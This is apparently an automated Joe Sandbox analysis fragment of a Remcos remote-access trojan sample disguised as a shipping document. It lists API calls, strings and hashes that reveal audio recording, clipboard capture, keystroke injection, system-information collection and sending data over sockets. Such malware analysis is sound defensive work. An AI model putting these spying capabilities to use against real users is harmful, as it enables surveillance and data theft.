                                                      • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • Sleep.KERNEL32(00000064), ref: 00416688
                                                      • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateDeleteExecuteShellSleep
                                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                      • API String ID: 1462127192-2001430897
                                                      • Opcode ID: 6f7592da00a282af32ff41b540dad8098d47f26c763fabcb562c03d6f79861a4
                                                      • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                      • Opcode Fuzzy Hash: 6f7592da00a282af32ff41b540dad8098d47f26c763fabcb562c03d6f79861a4
                                                      • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                      APIs
                                                      • _strftime.LIBCMT ref: 00401AD3
                                                        • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                      • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                      • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                      • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                      • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                      • API String ID: 3809562944-3643129801
                                                      • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                      • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                      • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                      • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                      • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                      • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                      • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                      • waveInStart.WINMM ref: 00401A81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                      • String ID: XCG$`=G$x=G
                                                      • API String ID: 1356121797-903574159
                                                      • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                      • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                      • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                      • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                        • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                        • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                        • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                      • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                      • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                      • TranslateMessage.USER32(?), ref: 0041C9FB
                                                      • DispatchMessageA.USER32(?), ref: 0041CA05
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                      • String ID: Remcos
                                                      • API String ID: 1970332568-165870891
                                                      • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                      • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                      • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                      • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                      • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                      • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                      • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                      • __alloca_probe_16.LIBCMT ref: 00452C91
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                      • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                      • __freea.LIBCMT ref: 00452DAA
                                                      • __freea.LIBCMT ref: 00452DB6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 201697637-0
                                                      • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                      • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                      • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                      • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                      • _free.LIBCMT ref: 00444714
                                                      • _free.LIBCMT ref: 0044472D
                                                      • _free.LIBCMT ref: 0044475F
                                                      • _free.LIBCMT ref: 00444768
                                                      • _free.LIBCMT ref: 00444774
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                      • String ID: C
                                                      • API String ID: 1679612858-1037565863
                                                      • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                      • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                      • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                      • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tcp$udp
                                                      • API String ID: 0-3725065008
                                                      • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                      • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                      • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                      • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                      APIs
                                                      • ExitThread.KERNEL32 ref: 004017F4
                                                        • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                        • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                        • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                      • __Init_thread_footer.LIBCMT ref: 004017BC
                                                        • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                        • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                      • String ID: T=G$p[G$>G$>G
                                                      • API String ID: 1596592924-2461731529
                                                      • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                      • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                      • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                      • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                        • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                        • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                      • String ID: .part
                                                      • API String ID: 1303771098-3499674018
                                                      • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                      • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                      • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                      • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                      APIs
                                                        • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                        • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                        • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                        • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                      • _wcslen.LIBCMT ref: 0041A8F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                      • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                      • API String ID: 37874593-703403762
                                                      • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                      • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                      • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                      • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                      • __alloca_probe_16.LIBCMT ref: 004499E2
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                      • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                      • __freea.LIBCMT ref: 00449B37
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      • __freea.LIBCMT ref: 00449B40
                                                      • __freea.LIBCMT ref: 00449B65
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3864826663-0
                                                      • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                      • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                      • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                      • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                      APIs
                                                      • SendInput.USER32 ref: 00418B08
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                        • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InputSend$Virtual
                                                      • String ID:
                                                      • API String ID: 1167301434-0
                                                      • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                      • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                      • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                      • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                      APIs
                                                      • OpenClipboard.USER32 ref: 00415A46
                                                      • EmptyClipboard.USER32 ref: 00415A54
                                                      • CloseClipboard.USER32 ref: 00415A5A
                                                      • OpenClipboard.USER32 ref: 00415A61
                                                      • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                      • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                      • CloseClipboard.USER32 ref: 00415A89
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                      • String ID:
                                                      • API String ID: 2172192267-0
                                                      • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                      • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                      • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                      • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                      APIs
                                                      • _free.LIBCMT ref: 00447EBC
                                                      • _free.LIBCMT ref: 00447EE0
                                                      • _free.LIBCMT ref: 00448067
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                      • _free.LIBCMT ref: 00448233
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                      • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                      • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                      • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                      • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                      • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                      • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                      APIs
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      • _free.LIBCMT ref: 00444086
                                                      • _free.LIBCMT ref: 0044409D
                                                      • _free.LIBCMT ref: 004440BC
                                                      • _free.LIBCMT ref: 004440D7
                                                      • _free.LIBCMT ref: 004440EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID: J7D
                                                      • API String ID: 3033488037-1677391033
                                                      • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                      • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                      • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                      • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                      • __fassign.LIBCMT ref: 0044A180
                                                      • __fassign.LIBCMT ref: 0044A19B
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                      • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                      • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                      • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                      • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                      • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID: HE$HE
                                                      • API String ID: 269201875-1978648262
                                                      • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
